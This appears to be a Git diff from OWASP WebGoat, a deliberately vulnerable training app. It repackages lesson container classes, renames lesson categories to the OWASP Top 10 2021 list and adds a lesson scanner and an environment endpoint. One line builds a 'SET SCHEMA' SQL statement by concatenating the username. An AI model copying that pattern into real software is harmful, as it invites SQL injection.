package org.owasp.webgoat.lessons; package org.owasp.webgoat.container.lessons;
import lombok.Getter; import lombok.Getter;
@ -39,36 +39,19 @@ public enum Category {
INTRODUCTION("Introduction", 5), INTRODUCTION("Introduction", 5),
GENERAL("General", 100), GENERAL("General", 100),
INJECTION("(A1) Injection", 300), A1("(A1) Broken Access Control", 301),
AUTHENTICATION("(A2) Broken Authentication", 302), A2("(A2) Cryptographic Failures", 302),
INSECURE_COMMUNICATION("(A3) Sensitive Data Exposure", 303), A3("(A3) Injection", 303),
XXE("(A4) XML External Entities (XXE)", 304),
ACCESS_CONTROL("(A5) Broken Access Control", 305),
XSS("(A7) Cross-Site Scripting (XSS)", 307), A5("(A5) Security Misconfiguration", 305),
INSECURE_DESERIALIZATION("(A8) Insecure Deserialization", 308), A6("(A6) Vuln & Outdated Components", 306),
VULNERABLE_COMPONENTS("(A9) Vulnerable Components", 309), A7("(A7) Identity & Auth Failure", 307),
SESSION_MANAGEMENT("(A10) Session Management Flaws", 310), A8("(A8) Software & Data Integrity", 308),
A9("(A9) Security Logging Failures", 309),
A10("(A10) Server-side Request Forgery", 310),
REQUEST_FORGERIES("(A8:2013) Request Forgeries", 318),
REQ_FORGERIES("Request Forgeries", 450),
INSECURE_CONFIGURATION("Insecure Configuration", 600),
INSECURE_STORAGE("Insecure Storage", 800),
AJAX_SECURITY("AJAX Security", 1000),
BUFFER_OVERFLOW("Buffer Overflows", 1100),
CODE_QUALITY("Code Quality", 1200),
CONCURRENCY("Concurrency", 1300),
ERROR_HANDLING("Improper Error Handling", 1400),
DOS("Denial of Service", 1500),
MALICIOUS_EXECUTION("Malicious Execution", 1600),
CLIENT_SIDE("Client side", 1700), CLIENT_SIDE("Client side", 1700),
WEB_SERVICES("Web Services", 1900),
ADMIN_FUNCTIONS("Admin Functions", 2000),
CHALLENGE("Challenges", 3000); CHALLENGE("Challenges", 3000);
@Getter @Getter

16
webgoat-container/src/main/java/org/owasp/webgoat/lessons/CourseConfiguration.java → src/main/java/org/owasp/webgoat/container/lessons/CourseConfiguration.java
View File

@ -20,14 +20,14 @@
* Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects. * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
*/ */
package org.owasp.webgoat.lessons; package org.owasp.webgoat.container.lessons;
import lombok.extern.slf4j.Slf4j; import lombok.extern.slf4j.Slf4j;
import org.apache.commons.lang3.ArrayUtils; import org.apache.commons.lang3.ArrayUtils;
import org.owasp.webgoat.assignments.AssignmentEndpoint; import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
import org.owasp.webgoat.assignments.AssignmentHints; import org.owasp.webgoat.container.assignments.AssignmentHints;
import org.owasp.webgoat.assignments.AttackResult; import org.owasp.webgoat.container.assignments.AttackResult;
import org.owasp.webgoat.session.Course; import org.owasp.webgoat.container.session.Course;
import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration; import org.springframework.context.annotation.Configuration;
import org.springframework.util.CollectionUtils; import org.springframework.util.CollectionUtils;
@ -67,9 +67,11 @@ public class CourseConfiguration {
var endpoints = assignmentsByPackage.get(lesson.getClass().getPackageName()); var endpoints = assignmentsByPackage.get(lesson.getClass().getPackageName());
if (CollectionUtils.isEmpty(endpoints)) { if (CollectionUtils.isEmpty(endpoints)) {
log.warn("Lesson: {} has no endpoints, is this intentionally?", lesson.getTitle()); log.warn("Lesson: {} has no endpoints, is this intentionally?", lesson.getTitle());
return new ArrayList(); return new ArrayList<>();
} }
return endpoints.stream().map(e -> new Assignment(e.getClass().getSimpleName(), getPath(e.getClass()), getHints(e.getClass()))).collect(toList()); return endpoints.stream()
.map(e -> new Assignment(e.getClass().getSimpleName(), getPath(e.getClass()), getHints(e.getClass())))
.toList();
} }
private String getPath(Class<? extends AssignmentEndpoint> e) { private String getPath(Class<? extends AssignmentEndpoint> e) {

2
webgoat-container/src/main/java/org/owasp/webgoat/lessons/Hint.java → src/main/java/org/owasp/webgoat/container/lessons/Hint.java
View File

@ -25,7 +25,7 @@
* *
*/ */
package org.owasp.webgoat.lessons; package org.owasp.webgoat.container.lessons;
import lombok.Value; import lombok.Value;

12
src/main/java/org/owasp/webgoat/container/lessons/Initializeable.java Normal file
View File

@ -0,0 +1,12 @@
package org.owasp.webgoat.container.lessons;
import org.owasp.webgoat.container.users.WebGoatUser;
/**
* Interface for initialization of a lesson. It is called when a new user is added to WebGoat and when a users
* reset a lesson. Make sure to clean beforehand and then re-initialize the lesson.
*/
public interface Initializeable {
void initialize(WebGoatUser webGoatUser);
}

19
webgoat-container/src/main/java/org/owasp/webgoat/lessons/Lesson.java → src/main/java/org/owasp/webgoat/container/lessons/Lesson.java
View File

@ -20,11 +20,10 @@
* Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects. * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
*/ */
package org.owasp.webgoat.lessons; package org.owasp.webgoat.container.lessons;
import lombok.Getter; import lombok.Getter;
import lombok.Setter; import lombok.Setter;
import lombok.Singular;
import java.util.List; import java.util.List;
@ -39,7 +38,7 @@ public abstract class Lesson {
/** /**
* Constructor for the Lesson object * Constructor for the Lesson object
*/ */
public Lesson() { protected Lesson() {
id = ++count; id = ++count;
} }
@ -66,7 +65,7 @@ public abstract class Lesson {
/** /**
* <p>getDefaultCategory.</p> * <p>getDefaultCategory.</p>
* *
* @return a {@link org.owasp.webgoat.lessons.Category} object. * @return a {@link org.owasp.webgoat.container.lessons.Category} object.
*/ */
protected abstract Category getDefaultCategory(); protected abstract Category getDefaultCategory();
@ -122,4 +121,16 @@ public abstract class Lesson {
public final String getId() { public final String getId() {
return this.getClass().getSimpleName(); return this.getClass().getSimpleName();
} }
public final String getPackage() {
var packageName = this.getClass().getPackageName();
//package name is the direct package name below lessons (any subpackage will be removed)
return packageName.replaceAll("org.owasp.webgoat.lessons.", "").replaceAll("\\..*", "");
}
} }

13
webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonConnectionInvocationHandler.java → src/main/java/org/owasp/webgoat/container/lessons/LessonConnectionInvocationHandler.java
View File

@ -1,6 +1,7 @@
package org.owasp.webgoat.lessons; package org.owasp.webgoat.container.lessons;
import org.owasp.webgoat.users.WebGoatUser; import lombok.extern.slf4j.Slf4j;
import org.owasp.webgoat.container.users.WebGoatUser;
import org.springframework.security.core.context.SecurityContextHolder; import org.springframework.security.core.context.SecurityContextHolder;
import java.lang.reflect.InvocationHandler; import java.lang.reflect.InvocationHandler;
@ -12,6 +13,7 @@ import java.sql.Connection;
* Handler which sets the correct schema for the currently bounded user. This way users are not seeing each other * Handler which sets the correct schema for the currently bounded user. This way users are not seeing each other
* data and we can reset data for just one particular user. * data and we can reset data for just one particular user.
*/ */
@Slf4j
public class LessonConnectionInvocationHandler implements InvocationHandler { public class LessonConnectionInvocationHandler implements InvocationHandler {
private final Connection targetConnection; private final Connection targetConnection;
@ -23,9 +25,10 @@ public class LessonConnectionInvocationHandler implements InvocationHandler {
@Override @Override
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable { public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
var authentication = SecurityContextHolder.getContext().getAuthentication(); var authentication = SecurityContextHolder.getContext().getAuthentication();
if (authentication != null && authentication.getPrincipal() instanceof WebGoatUser) { if (authentication != null && authentication.getPrincipal() instanceof WebGoatUser user) {
var user = (WebGoatUser) authentication.getPrincipal(); try (var statement = targetConnection.createStatement()) {
targetConnection.createStatement().execute("SET SCHEMA \"" + user.getUsername() + "\""); statement.execute("SET SCHEMA \"" + user.getUsername() + "\"");
}
} }
try { try {
return method.invoke(targetConnection, args); return method.invoke(targetConnection, args);

2
webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonInfoModel.java → src/main/java/org/owasp/webgoat/container/lessons/LessonInfoModel.java
View File

@ -1,4 +1,4 @@
package org.owasp.webgoat.lessons; package org.owasp.webgoat.container.lessons;
import lombok.AllArgsConstructor; import lombok.AllArgsConstructor;
import lombok.Getter; import lombok.Getter;

4
webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonMenuItem.java → src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItem.java
View File

@ -27,7 +27,7 @@
* https://github.com/WebGoat/WebGoat, a repository for free software projects. * https://github.com/WebGoat/WebGoat, a repository for free software projects.
*/ */
package org.owasp.webgoat.lessons; package org.owasp.webgoat.container.lessons;
import java.util.ArrayList; import java.util.ArrayList;
import java.util.List; import java.util.List;
@ -42,7 +42,7 @@ public class LessonMenuItem {
private String name; private String name;
private LessonMenuItemType type; private LessonMenuItemType type;
private List<LessonMenuItem> children = new ArrayList<LessonMenuItem>(); private List<LessonMenuItem> children = new ArrayList<>();
private boolean complete; private boolean complete;
private String link; private String link;
private int ranking; private int ranking;

2
webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonMenuItemType.java → src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItemType.java
View File

@ -25,7 +25,7 @@
* *
*/ */
package org.owasp.webgoat.lessons; package org.owasp.webgoat.container.lessons;
/** /**
* <p>LessonMenuItemType class.</p> * <p>LessonMenuItemType class.</p>

46
src/main/java/org/owasp/webgoat/container/lessons/LessonScanner.java Normal file
View File

@ -0,0 +1,46 @@
package org.owasp.webgoat.container.lessons;
import lombok.Getter;
import lombok.extern.slf4j.Slf4j;
import org.springframework.core.io.ClassPathResource;
import org.springframework.core.io.support.ResourcePatternResolver;
import org.springframework.stereotype.Component;
import java.io.IOException;
import java.util.ArrayList;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.regex.Pattern;
@Component
@Slf4j
public class LessonScanner {
private static final Pattern lessonPattern = Pattern.compile("^.*/lessons/([^/]*)/.*$");
@Getter
private final Set<String> lessons = new HashSet<>();
public LessonScanner(ResourcePatternResolver resourcePatternResolver) {
try {
var resources = resourcePatternResolver.getResources("classpath:/lessons/*/*");
for (var resource : resources) {
//WG can run as a fat jar or as directly from file system we need to support both so use the URL
var url = resource.getURL();
var matcher = lessonPattern.matcher(url.toString());
if (matcher.matches()) {
lessons.add(matcher.group(1));
}
}
log.debug("Found {} lessons", lessons.size());
} catch (IOException e) {
log.warn("No lessons found...");
}
}
public List<String> applyPattern(String pattern) {
return lessons.stream().map(lesson -> String.format(pattern, lesson)).toList();
}
}

19
src/main/java/org/owasp/webgoat/container/service/EnvironmentService.java Normal file
View File

@ -0,0 +1,19 @@
package org.owasp.webgoat.container.service;
import lombok.RequiredArgsConstructor;
import org.springframework.context.ApplicationContext;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RestController;
@RestController("/environment")
@RequiredArgsConstructor
public class EnvironmentService {
private final ApplicationContext context;
@GetMapping("/server-directory")
public String homeDirectory() {
return context.getEnvironment().getProperty("webgoat.server.directory");
}
}

Some files were not shown because too many files have changed in this diff Show More